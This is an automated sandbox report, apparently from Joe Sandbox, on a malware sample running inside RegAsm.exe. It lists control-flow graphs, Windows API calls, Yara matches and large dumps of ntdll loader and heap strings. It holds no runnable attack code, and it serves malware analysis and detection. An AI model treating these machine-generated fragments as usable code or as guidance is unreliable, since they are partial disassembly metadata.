                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 178 2892b60-2892b6c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 179 2892c70-2892c7c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 414665-41466c 1 414614 0->1 2 41466e 0->2 3 414617-41463d call 4254e3 1->3 4 414670-414679 2->4 5 4145f5-414605 2->5 15 41465d-414663 3->15 16 41463f-41464e PostThreadMessageW 3->16 10 41467b-41467f 4->10 8 41460b-414612 call 404853 5->8 9 414606 call 417da3 5->9 8->3 9->8 13 414681-414686 10->13 14 41469d-4146a3 10->14 13->14 17 414688-41468d 13->17 14->10 18 4146a5-4146a8 14->18 16->15 19 414650-41465a 16->19 17->14 21 41468f-414696 17->21 19->15 22 4146a9-4146ac 21->22 23 414698-41469b 21->23 23->14 23->22
                                                  APIs
                                                  • PostThreadMessageW.USER32(04j58b6g,00000111,00000000,00000000), ref: 0041464A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 04j58b6g$04j58b6g
                                                  • API String ID: 1836367815-1473487654

                                                  Control-flow Graph

                                                  APIs
                                                  • PostThreadMessageW.USER32(04j58b6g,00000111,00000000,00000000), ref: 0041464A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 04j58b6g$04j58b6g
                                                  • API String ID: 1836367815-1473487654

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 39 42d123-42d164 call 4048e3 call 42dff3 RtlFreeHeap
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D15F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: jA
                                                  • API String ID: 3298025750-2063099575

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 146 417e3a-417e40 147 417e44-417e49 146->147 148 417dd8-417de0 147->148 149 417e4a-417e58 147->149 150 417df0-417e01 call 42e503 148->150 151 417de2-417ded call 4302e3 148->151 149->147 152 417e5a-417e5b 149->152 157 417e03-417e17 LdrLoadDll 150->157 158 417e1a-417e1d 150->158 151->150 157->158
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 159 42d0d3-42d117 call 4048e3 call 42dff3 RtlAllocateHeap
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,0041EB9E,?,?,00000000,?,0041EB9E,?,?,?), ref: 0042D112
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 169 42d173-42d1af call 4048e3 call 42dff3 ExitProcess
                                                  APIs
                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,B00F02C4,?,?,B00F02C4), ref: 0042D1AA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 174 2892c0a-2892c0f 175 2892c1f-2892c26 LdrInitializeThunk 174->175 176 2892c11-2892c18 174->176
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2160512332
                                                  Strings
                                                  • Address of the debug info found in the active list., xrefs: 028C54AE, 028C54FA
                                                  • Critical section address., xrefs: 028C5502
                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 028C54CE
                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 028C540A, 028C5496, 028C5519
                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 028C54E2
                                                  • Thread identifier, xrefs: 028C553A
                                                  • 8, xrefs: 028C52E3
                                                  • Critical section address, xrefs: 028C5425, 028C54BC, 028C5534
                                                  • corrupted critical section, xrefs: 028C54C2
                                                  • undeleted critical section in freed memory, xrefs: 028C542B
                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 028C5543
                                                  • double initialized or corrupted critical section, xrefs: 028C5508
                                                  • Critical section debug info address, xrefs: 028C541F, 028C552E
                                                  • Invalid debug info address of this critical section, xrefs: 028C54B6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                  • API String ID: 0-2368682639
                                                  Strings
                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 028C2498
                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 028C2409
                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 028C25EB
                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 028C2506
                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 028C2602
                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 028C2624
                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 028C2412
                                                  • @, xrefs: 028C259B
                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 028C22E4
                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 028C24C0
                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 028C261F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                  • API String ID: 0-4009184096
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                  • API String ID: 0-2515994595
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 0-1700792311
                                                  Strings
                                                  • VerifierDlls, xrefs: 028D8CBD
                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 028D8A67
                                                  • VerifierFlags, xrefs: 028D8C50
                                                  • VerifierDebug, xrefs: 028D8CA5
                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 028D8A3D
                                                  • AVRF: -*- final list of providers -*- , xrefs: 028D8B8F
                                                  • HandleTraces, xrefs: 028D8C8F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                  • API String ID: 0-3223716464
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                  • API String ID: 0-1109411897
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-792281065
                                                  Strings
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 028A99ED
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 028A9A01
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 028A9A11, 028A9A3A
                                                  • LdrpInitShimEngine, xrefs: 028A99F4, 028A9A07, 028A9A30
                                                  • apphelp.dll, xrefs: 02846496
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 028A9A2A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-204845295
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0288C6C3
                                                  • LdrpInitializeProcess, xrefs: 0288C6C4
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 028C8181, 028C81F5
                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 028C81E5
                                                  • Loading import redirection DLL: '%wZ', xrefs: 028C8170
                                                  • LdrpInitializeImportRedirection, xrefs: 028C8177, 028C81EB
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-475462383
                                                  Strings
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 028C2180
                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 028C219F
                                                  • RtlGetAssemblyStorageRoot, xrefs: 028C2160, 028C219A, 028C21BA
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 028C21BF
                                                  • SXS: %s() passed the empty activation context, xrefs: 028C2165
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 028C2178
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                  • API String ID: 0-861424205
                                                  APIs
                                                    • Part of subcall function 02892DF0: LdrInitializeThunk.NTDLL ref: 02892DFA
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02890BA3
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02890BB6
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02890D60
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02890D74
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                  • String ID:
                                                  • API String ID: 1404860816-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                  • API String ID: 0-379654539
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02888421
                                                  • LdrpInitializeProcess, xrefs: 02888422
                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0288855E
                                                  • @, xrefs: 02888591
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1918872054
                                                  Strings
                                                  • SXS: %s() passed the empty activation context, xrefs: 028C21DE
                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 028C21D9, 028C22B1
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 028C22B6
                                                  • .Local, xrefs: 028828D8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                  • API String ID: 0-1239276146
                                                  Strings
                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 028C342A
                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 028C3456
                                                  • RtlDeactivateActivationContext, xrefs: 028C3425, 028C3432, 028C3451
                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 028C3437
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                  • API String ID: 0-1245972979
                                                  Strings
                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 028B1028
                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 028B106B
                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 028B0FE5
                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 028B10AE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                  • API String ID: 0-1468400865
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 028BA9A2
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 028BA992
                                                  • LdrpDynamicShimModule, xrefs: 028BA998
                                                  • apphelp.dll, xrefs: 02872462
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-176724104
                                                  Strings
                                                  • HEAP[%wZ]: , xrefs: 02863255
                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0286327D
                                                  • HEAP: , xrefs: 02863264
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                  • API String ID: 0-617086771
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                  • API String ID: 0-2779062949
                                                  Strings
                                                  • Failed to allocated memory for shimmed module list, xrefs: 028BA10F
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 028BA121
                                                  • LdrpCheckModule, xrefs: 028BA117
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-161242083
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-1334570610
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 028C82E8
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 028C82DE
                                                  • Failed to reallocate the system dirs string !, xrefs: 028C82D7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1783798831
                                                  Strings
                                                  • @, xrefs: 0290C1F1
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0290C1C5
                                                  • PreferredUILanguages, xrefs: 0290C212
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                  • API String ID: 0-2968386058
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                  • API String ID: 0-1373925480
                                                  Strings
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 028D4888
